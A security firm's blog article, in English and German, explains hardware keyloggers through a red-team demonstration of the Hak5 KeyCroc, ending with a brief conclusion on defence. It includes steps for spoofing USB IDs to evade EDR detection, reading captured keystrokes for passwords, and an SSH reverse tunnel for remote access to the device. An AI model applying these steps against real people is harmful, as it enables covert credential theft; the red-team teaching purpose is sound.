Hardware-Keylogger - Behind the Keyboard

Hardware-Keylogger

Behind the Keyboard

Marius Elmiger
by Marius Elmiger
on July 06, 2023
time to read: 18 minutes

Keypoints

This is how Hardware Keyloggers work

  • An exploration of the purpose and functionality of hardware keyloggers
  • How hardware keyloggers are configured and installed
  • Illustrating the process of capturing keystrokes
  • Detection and prevention against hardware keyloggers

In the realm of IT security, the threat landscape constantly evolves, with adversaries employing increasingly sophisticated methods to gain unauthorised access to sensitive information. Among the covert tools adversaries utilise, hardware keyloggers can be used as stealthy devices designed to capture keystrokes covertly. With their inconspicuous nature and ability to intercept and record every keyboard stroke, these devices pose risks to organisations. In this article, we delve into the world of hardware keyloggers, exploring their functionality, potential applications, and the measures necessary to protect against this form of attack.

The attack scenario later described in this article is mainly based on an insider threat in which an adversary may conduct attacks by planting a hardware keylogger to capture confidential data or passwords.

What is a Hardware Keylogger?

Hardware keyloggers are physical devices that are connected between the keyboard and the computer. They record information directly from the keyboard before it reaches the computer’s operating system. By doing so, the attacker gains the ability to silently capture passwords, login credentials, and other confidential information. They may store the recorded data internally in their own memory or have the capability to transmit it wirelessly to a remote location for retrieval. Hardware keyloggers can be challenging to detect as they are physically hidden between the keyboard and the computer. This sets them apart to Software keyloggers which may be detected through antivirus, anti-malware scans or EDR solutions.

To construct a hardware keylogger from the ground up, there are various manuals available, such as the one by spacehuhn, keelog or RedBulletTooling. Alternatively, ready-made keyloggers can be purchased from reputable manufacturers. Hak5 and O.MG are among the well-known and trusted manufacturers in this field. Unfortunately, commercial Keyloggers are mostly closed source. Therefore even when the manufacturer is generaly trusted the device it is crucial to do a detailed analysis by reviewing its functionality.

KeyCroc Hardware Keylogger

Who will use them?

Various actors can install hardware keyloggers, each with their own motives and methods. Here are some possible scenarios:

It’s important to note that the sophistication of hardware keyloggers varies. Some may be discreetly integrated into the device or peripheral, making them difficult to detect visually. Additionally, keyloggers can transmit captured data remotely if they have Wifi or mobile data connection capabilities implemented

Example Attack

The previously mentioned scenarios are ideal to simulate during a Red Team engagement. Subsequently, in the following sections, we explain how the Hak5 KeyCroc can effectively function as a keylogger, capturing keystrokes and facilitating remote access. However, it is important to note that the KeyCroc offers additional functionalities beyond keystroke logging. These include keystroke injection, trusted device emulation, pattern matching payloads, network hijacking, Wi-Fi connectivity, and more. Additionally, Hak5 has provided multiple keystroke injection samples on their GitHub repository.

KeyCroc, Original Source: https://shop.hak5.org/products/key-croc

KeyCroc Configuration

Some configuration steps are required before the KeyCroc can be used. The following chapters complement the HAK5 KeyCroc documentation. Additionally, you should thoroughly review the behaviour of the keylogger, for example, for unwanted communication.

PID/VID ID Cloning

The KeyCroc with the Version 1.3_513 is not cloning the keyboard VID (Vendor ID) and PID (Product ID). Without fixing this behaviour, the KeyCroc is detected by modern EDRs.

Default KeyCroc is getting detected by EDRs, Picture from Microsoft Defender for Endpoint

To correct this behavior, we suggest following these steps:

Fix the default VID and PID

With the following steps you can change the default KeyCroc VID and PID.

cd /usr/local/croc/bin
cp ATTACKMODE ATTACKMODE.bak
nano ATTACKMODE

We also recommend changing the default VID and PID for the storage and the network adapter.

Fix the cloning functionality

The following steps are fixing the cloning functionality of the keyCroc.

cd /usr/local/croc/bin
cp croc_framework croc_framework.bak
nano croc_framework

General Setup

This step only needs to be done once before the Key Croc device can be used.

We verified the Key Croc with the following keyboards:

KeyCroc in Action

KeyCroc in Action

How to read out the Loot log

Loot example from a KeyCroc

The following PowerShell script can support you in finding passwords or other information faster: keycroc_char_analysis.ps1

Remote connection via Internet to the KeyCroc

The following proof-of-concept describe how you can connect via SSH remotely to the KeyCroc.

POC prerequisites

Prepare the KeyCroc

ssh-keygen -t ed25519 -m PKCS8 -C "$(whoami)@$(hostname)-$(date -I)" -f ~/.ssh/id_ed25519_home

Remote SSH Server

sudo useradd -m keycroc
sudo mkdir /home/keycroc/.ssh
sudo touch /home/keycroc/.ssh/authorized_keys
sudo chown -R keycroc:keycroc /home/keycroc/.ssh/
sudo chmod 700 /home/keycroc/.ssh
sudo chmod 600 /home/keycroc/.ssh/authorized_keys
sudo nano /etc/passwd

Prepare a Mobile Data Connection Device The following example is using an Android phone with a mobile data connection plan. We recommend to use a keyboard to configure the phone. The phone should be encrypted and using a strong password to unlock the phone.

pkg upgrade
pkg update
pkg install openssh
pkg install screen

ssh -N -R 42022:localhost:8022 -p 50022 -i /data/data/com.termux/files/home/storage/downloads/keycroc-openssh-privkey.ppk keycroc@$SHHServerIP

Establish the connection to the KeyCroc

ssh u0_a255@localhost -p 42022
ssh root@192.168.43.30

Remote connection to the KeyCroc

Countermeasures

To reduce the risk of hardware keyloggers, the following measures can be taken:

Conclusion

In conclusion, hardware keyloggers can pose a threat to the security of organizations, as they can covertly intercept and record keystrokes and compromising sensitive information. This article has provided an overview of hardware keyloggers, their attack scenarios, and a technical example illustrating how they operate. To counter the dangers associated with hardware keyloggers and safeguard assets from internal threats, it is crucial for organizations to adopt a comprehensive approach. Technological safeguards play a vital role in mitigating risks. However, technological measures alone are not sufficient. Organizations must also prioritize employee education and awareness. It is essential to foster a positive security culture within the organization, emphasizing the importance of security measures and encouraging employees to actively participate in protecting sensitive information. Furthermore, organizations should appreciate their employees and create an environment where they feel valued and motivated. This helps foster loyalty and reduces the likelihood of insider threats. By promoting a positive work environment, organizations can minimize the risk of employees turning to malicious activities. Finally, an effective incident response framework is critical in addressing keylogger incidents promptly and efficiently. Establishing clear protocols and response plans, conducting exercises, and maintaining strong communication channels within the organization enables swift detection, containment, and resolution of keylogger-related incidents. By combining these measures, organizations can enhance their defenses against keyloggers, mitigate risks from adversaries, and better protect their IT-environment and sensitive information.

About the Author

Marius Elmiger

Marius Elmiger is a security professional since the early 2000’s. He worked in various IT roles such as an administrator, engineer, architect, and consultant. His main activities included the implementation of complex IT infrastructure projects, implementation of security hardening concepts, and compromise recoveries. Later he transitioned to the offensive side. As a foundation, in addition to numerous IT certificates, Marius graduated with an MSc in Advanced Security & Digital Forensics at Edinburgh Napier University. (ORCID 0000-0002-2580-5636)

Links

You want to bring your logging and monitoring to the next level?

Our experts will get in contact with you!

×
Credential Tiering

Credential Tiering

Marius Elmiger

Credential Tiering

Credential Tiering

Marius Elmiger

Outsmarting the Watchdog

Outsmarting the Watchdog

Marius Elmiger

Hidden Dangers of Phishing Attacks

Hidden Dangers of Phishing Attacks

Marius Elmiger

You want more?

Further articles available here

You need support in such a project?

Our experts will get in contact with you!

You want more?

Further articles available here

Hardware-Keylogger - Die unsichtbare Bedrohung

Hardware-Keylogger

Die unsichtbare Bedrohung

Marius Elmiger
von Marius Elmiger
am 06. Juli 2023
Lesezeit: 19 Minuten

Keypoints

So funktionieren Hardware-Keylogger

  • Eine Untersuchung des Zwecks und der Funktionsweise von Hardware-Keyloggern
  • Wie Hardware-Keylogger konfiguriert und installiert werden
  • Veranschaulichung des Prozesses der Erfassung von Tastenanschlägen
  • Erkennung und Verhinderung von Hardware-Keyloggern

Im Bereich der IT-Sicherheit entwickelt sich die Bedrohungslandschaft ständig weiter, wobei Hacker immer raffiniertere Methoden anwenden, um sich unbefugten Zugang zu sensiblen Informationen zu verschaffen. Zu den verdeckten Werkzeugen, die von den Angreifern eingesetzt werden können, gehören Hardware-Keylogger, die als unauffällige Geräte entwickelt wurden, um Tastenanschläge heimlich zu erfassen. Aufgrund ihrer Unauffälligkeit und ihrer Fähigkeit, jeden Tastendruck abzufangen und aufzuzeichnen, stellen diese Geräte für Unternehmen ein Risiko dar. In diesem Artikel tauchen wir in die Welt der Hardware-Keylogger ein und untersuchen ihre Funktionsweise, mögliche Anwendungen und die Massnahmen, die zum Schutz vor dieser Form des Angriffs erforderlich sind.

Das später in diesem Artikel beschriebene Angriffsszenario basiert hauptsächlich auf einer Insider-Bedrohung, bei der ein Angreifer einen Hardware-Keylogger einschleust, um vertrauliche Daten oder Kennwörter abzugreifen.

Was ist ein Hardware Keylogger?

Hardware-Keylogger sind physische Geräte, die zwischen der Tastatur und dem Computer angeschlossen werden. Sie zeichnen Informationen direkt von der Tastatur auf, bevor sie das Betriebssystem des Computers erreichen. Auf diese Weise ist der Angreifer in der Lage, Passwörter, Anmeldedaten und andere vertrauliche Informationen unbemerkt zu erfassen. Sie können die aufgezeichneten Daten intern in ihrem eigenen Speicher speichern oder sie drahtlos an einen entfernten Standort übertragen, um sie abzurufen. Hardware-Keylogger können schwer zu entdecken sein, da sie physisch zwischen der Tastatur und dem Computer befinden. Dadurch unterscheiden sie sich von Software-Keyloggern, die durch Antiviren-, Anti-Malware-Scans oder EDR-Lösungen entdeckt werden können.

Um einen Hardware-Keylogger von Grund auf selbst zu bauen, gibt es verschiedene Anleitungen, wie die von spacehuhn, keelog oder RedBulletTooling. Alternativ können auch fertige Keylogger von seriösen Herstellern erworben werden. Hak5 und O.MG gehören zu den bekannten und vertrauenswürdigen Herstellern in diesem Bereich. Leider handelt es sich bei kommerziellen Keyloggern meist um Closed Source. Daher ist es, selbst wenn der Hersteller allgemein als vertrauenswürdig eingestuft wird, unerlässlich, das Gerät einer detaillierten Analyse zu unterziehen, indem man die Funktionen überprüft.

KeyCroc Hardware Keylogger

Wer verwendet Hardware Keylogger?

Verschiedene Akteure können Hardware-Keylogger installieren, jeder mit seinen eigenen Motiven und Methoden. Hier sind einige mögliche Szenarien:

Es ist wichtig zu wissen, dass die Hardware-Keylogger unterschiedlich ausgefeilt sein können. Einige können unauffällig in das Gerät oder die Peripherie integriert sein, so dass sie visuell schwer zu erkennen sind. Ausserdem können Keylogger die erfassten Daten aus der Ferne übertragen, wenn sie über WLAN- oder mobile Datenverbindungsfunktionen verfügen

Ein Beispiel eines Angriffs

Die zuvor genannten Szenarien sind ideal, um bei einem Red Team Einsatz zu simulieren. In den folgenden Abschnitten erläutern wir, wie der Hak5 KeyCroc effektiv als Keylogger fungieren kann, der Tastatureingaben aufzeichnet und den Fernzugriff erleichtert. Es ist jedoch wichtig, darauf hinzuweisen, dass der KeyCroc über die Aufzeichnung von Tastatureingaben hinaus noch weitere Funktionen bietet. Dazu gehören Keystroke Injection, Geräteemulation, Pattern-Matching-Payloads, Netzwerk-Hijacking, Wi-Fi-Konnektivität und mehr. Darüber hinaus hat Hak5 mehrere Keystroke-Injection-Beispiele auf seinem GitHub-Repository bereitgestellt.

KeyCroc, Originalquelle: https://shop.hak5.org/products/key-croc

KeyCroc Konfiguration

Bevor der KeyCroc verwendet werden kann, sind einige Konfigurationsschritte erforderlich. Die folgenden Kapitel ergänzen die HAK5 KeyCroc Dokumentation. Ausserdem sollte das Verhalten des Keyloggers gründlich überprüfen, z. B. auf unerwünschte Kommunikation überprüft werden.

PID/VID ID Cloning

Der KeyCroc mit der Version 1.3_513 klont nicht die VID (Vendor ID) und PID (Product ID) der Tastatur. Ohne Cloning, wird der KeyCroc von modernen EDRs erkannt.

Standard KeyCroc wird von EDRs erkannt, Originalquelle: Microsoft Defender for Endpoint

Um dieses Verhalten zu korrigieren, empfehlen wir die folgenden Schritte:

Anpassung der Standard-VID und PID

Mit den folgenden Schritten kann die standardmässige KeyCroc VID und PID geändert werden.

cd /usr/local/croc/bin
cp ATTACKMODE ATTACKMODE.bak
nano ATTACKMODE

Wir empfehlen, auch die Standard-VID und PID für den Speicher und die Netzwerkkarte zu ändern

Behebung der Cloning-Funktionalität

Die folgenden Schritte sind notwendig damit Cloning-Funktionalität des keyCroc funktioniert

cd /usr/local/croc/bin
cp croc_framework croc_framework.bak
nano croc_framework

Allgemeine Einstellungen

Dieser Schritt muss nur einmal durchgeführt werden, bevor das KeyCroc Gerät verwendet werden kann.

Wir haben den KeyCroc mit den folgenden Tastaturen getestet:

KeyCroc in Aktion

KeyCroc in Aktion

Wie man das Loot Log ausliest

Loot Log Beispiel

Das PowerShell-Skript keycroc_char_analysis.ps1 kann Helfen Kennwörter oder andere Informationen schnell aufzuspüren.

Remote Verbindung über das Internet zum KeyCroc

Das folgende Proof-of-Concept beschreibt, wie man sich per SSH über das Internet mit dem KeyCroc verbinden kann.

POC-Voraussetzungen

Prepare the KeyCroc

ssh-keygen -t ed25519 -m PKCS8 -C "$(whoami)@$(hostname)-$(date -I)" -f ~/.ssh/id_ed25519_home

Remote SSH Server

sudo useradd -m keycroc
sudo mkdir /home/keycroc/.ssh
sudo touch /home/keycroc/.ssh/authorized_keys
sudo chown -R keycroc:keycroc /home/keycroc/.ssh/
sudo chmod 700 /home/keycroc/.ssh
sudo chmod 600 /home/keycroc/.ssh/authorized_keys
sudo nano /etc/passwd

Vorbereiten eines Geräts für die mobile Datenverbindungen

Im folgenden Beispiel wird ein Android-Telefon mit einem mobilen Datenverbindungstarif verwendet. Wir empfehlen die Verwendung einer Tastatur zur Konfiguration des Telefons. Das Telefon sollte verschlüsselt sein und ein starkes Passwort zum Entsperren des Telefons verwenden.

pkg upgrade
pkg update
pkg install openssh
pkg install screen

ssh -N -R 42022:localhost:8022 -p 50022 -i /data/data/com.termux/files/home/storage/downloads/keycroc-openssh-privkey.ppk keycroc@$SHHServerIP

Herstellung der Verbindung zum KeyCroc

ssh u0_a255@localhost -p 42022
ssh root@192.168.43.30

Remote Verbindung zum KeyCroc

Gegenmassnahmen

Um das Risiko von Hardware-Keyloggern zu verringern, können folgende Massnahmen ergriffen werden:

Fazit

Zusammenfassend lässt sich sagen, dass Hardware-Keylogger eine Bedrohung für die Sicherheit von Unternehmen darstellen können, da sie heimlich Tastatureingaben abfangen und aufzeichnen können, wodurch sensible Informationen ausgelesen werden könnten. Dieser Artikel hat einen Überblick über Hardware-Keylogger, ihre Angriffsszenarien und ein technisches Beispiel gegeben, das ihre Funktionsweise veranschaulicht. Um den mit Hardware-Keyloggern verbundenen Gefahren zu begegnen, ist es für Unternehmen entscheidend, einen umfassenden Ansatz zu verfolgen. Technologische Sicherheitsvorkehrungen spielen eine wichtige Rolle bei der Risikominimierung. Technologische Massnahmen allein sind jedoch nicht ausreichend. Unternehmen müssen auch der Schulung und Sensibilisierung ihrer Mitarbeiter Vorrang einräumen. Es ist wichtig, eine positive Sicherheitskultur innerhalb der Organisation zu fördern, die Bedeutung von Sicherheitsmassnahmen zu betonen und die Mitarbeiter zu ermutigen, sich aktiv an der IT-Sicherheit zu beteiligen. Ausserdem sollten Unternehmen ihre Mitarbeiter wertschätzen und ein Umfeld schaffen, in dem sie sich wertgeschätzt und motiviert fühlen. Dadurch wird die Loyalität gefördert und die Wahrscheinlichkeit von Insider-Bedrohungen verringert. Durch die Förderung eines positiven Arbeitsumfelds können Unternehmen das Risiko minimieren, dass Mitarbeiter zu bösartigen Aktivitäten übergehen. Schliesslich ist ein effektiver Rahmen für die Reaktion auf Vorfälle von entscheidender Bedeutung, um Keylogger-Vorfälle umgehend und effizient zu bekämpfen. Die Erstellung klarer Protokolle und Reaktionspläne, die Durchführung von Übungen und die Aufrechterhaltung starker Kommunikationskanäle innerhalb des Unternehmens ermöglichen eine schnelle Erkennung, Eindämmung und Lösung von Keylogger-Vorfällen. Durch die Kombination dieser Massnahmen können Unternehmen ihre Abwehr gegen Keylogger verbessern, die Risiken von Angreifern mindern und ihre IT-Umgebung besser schützen.

Über den Autor

Marius Elmiger

Marius Elmiger hat seit den frühen 2000er Jahren Erfahrung in verschiedenen Rollen als Administrator, Engineer, Architekt und Consultant gesammelt. Sein Fokus lag hauptsächlich in der Implementierung von komplexen IT-Infrastruktur Projekten, Umsetzung von Sicherheitskonzepten und Compromise Recoveries. Später wechselte er zur offensiven Seite, um sein Wissen weiter auszubauen. Als Grundlage neben zahlreichen Zertifikaten absolvierte Marius ein MSc in Advanced Security & Digital Forensics an der Edinburgh Napier University. (ORCID 0000-0002-2580-5636)

Links

Herausforderung Datenschutz-Grundverordnung DSGVO?

Unsere Spezialisten kontaktieren Sie gern!

×
Credential Tiering

Credential Tiering

Marius Elmiger

Credential Tiering

Credential Tiering

Marius Elmiger

Outsmarting the Watchdog

Outsmarting the Watchdog

Marius Elmiger

Versteckte Gefahren von Phishing-Attacken

Versteckte Gefahren von Phishing-Attacken

Marius Elmiger

Sie wollen mehr?

Weitere Artikel im Archiv

Sie brauchen Unterstützung bei einem solchen Projekt?

Unsere Spezialisten kontaktieren Sie gern!

Sie wollen mehr?

Weitere Artikel im Archiv